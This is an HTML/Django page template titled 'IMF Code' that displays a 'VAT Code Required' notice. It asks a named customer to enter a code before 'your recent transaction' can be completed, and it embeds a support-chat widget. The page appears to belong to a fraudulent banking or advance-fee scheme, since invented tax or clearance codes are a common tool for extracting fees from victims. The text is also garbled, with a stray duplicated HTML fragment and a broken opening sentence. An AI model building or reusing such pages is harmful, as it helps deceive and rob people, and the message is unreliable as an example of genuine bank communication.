<!DOCTYPE html>
<html lang="en">
</body>
</html>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
    <title>IMF Code</title>
<link rel="icon" href="{% static 'images/logos.webp' %}" type="image/x-icon" />
<script type="text/javascript">
  window.helpcrunchSettings = {
    organization: 'creditrustinsurance',
    appId: 'b3648f3e-4f02-40eb-a64d-b251e4e416a7',
  };
</script>

<script type="text/javascript">
  (function(w,d){var hS=w.helpcrunchSettings;if(!hS||!hS.organization){return;}var widgetSrc='https://embed.helpcrunch.com/sdk.js';w.HelpCrunch=function(){w.HelpCrunch.q.push(arguments)};w.HelpCrunch.q=[];function r(){if (d.querySelector('script[src="' + widgetSrc + '"')) { return; }var s=d.createElement('script');s.async=1;s.type='text/javascript';s.src=widgetSrc;(d.body||d.head).appendChild(s);}if(d.readyState === 'complete'||hS.loadImmediately){r();} else if(w.attachEvent){w.attachEvent('onload',r)}else{w.addEventListener('load',r,false)}})(window, document)
</script>

    <style>
        body {
            background: -webkit-linear-gradient(left, #751ea6, #9d69c9);
            background: -ms-linear-gradient(left, #751ea6, #9d69c9);
            background: -moz-linear-gradient(left,#751ea6, #9d69c9);
            background: -o-linear-gradient(left, #751ea6, #9d69c9);
            color: white;
        }
        input, small {
            background-color: #29282c;
            color: #9c9c9a;
        }
        input {
            width: 100%;
            padding: 12px;
            font-size: 16px;
            color: #333;
            background-color: #f7f7f7;
            border: 2px solid #ddd;
            border-radius: 4px;
            transition: all 0.3s ease;
        }
        input:hover {
            border-color: #aaa;
        }
        input:focus {
            transform: scale(1.05);
            background-color: #e0f7fa;
            border-color: #00796b;
            box-shadow: 0 0 8px rgba(0, 121, 107, 0.5);
            color: #00796b;
        }
        input::placeholder {
            color: #888;
        }
        input:focus::placeholder {
            color: #00796b;
        }
        .card {
            background-color: #29282c;
        }
    </style>
</head>
<body>
    <div class="container my-5 text-light">
        <div class="text-center">
            <i class="bi bi-lock-fill" style="font-size: 50px;"></i>
            <p class="display-6">VAT Code Required</p>
        </div>

        <div class="text-center m-3">
            <p>Dear {{userprofile.first_name}} {{userprofile.middle_name}},</p>
            <p style="color: red;">To We hope this message finds you well.

        To complete your recent transaction, we need you to provide your VAT (Value Added Tax) code. This is necessary for processing and ensuring compliance with tax regulations.

        Please log in to your online banking account and enter your VAT code in the "Tax Information" section. If you require assistance or have any questions, feel free to reach out to our support team.

        Thank you for your cooperation.

        Best regards,
 </p>
        </div>

        <div class="row justify-content-center">
            <form method="post" class="col-12 col-md-10 col-lg-8">
                {% csrf_token %}
                <label for="id_vat" class="form-label">Enter VAT Code:</label>
                <div class="mb-4 input-group">
                    {{ form.vat }}
                </div>
                {% if form.errors %}
                    <div class="alert alert-danger">
                        {% for error in form.non_field_errors %}
                            <p>{{ error }}</p>
                        {% endfor %}
                    </div>
                {% endif %}

                <div class="card text-center text-muted p-3 mb-4">
                    <small>Thank you for your cooperation.<br>Best regards,</small>
                </div>

                <button type="submit" class="btn btn-primary w-100">Verify</button>
            </form>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
</body>
</html>
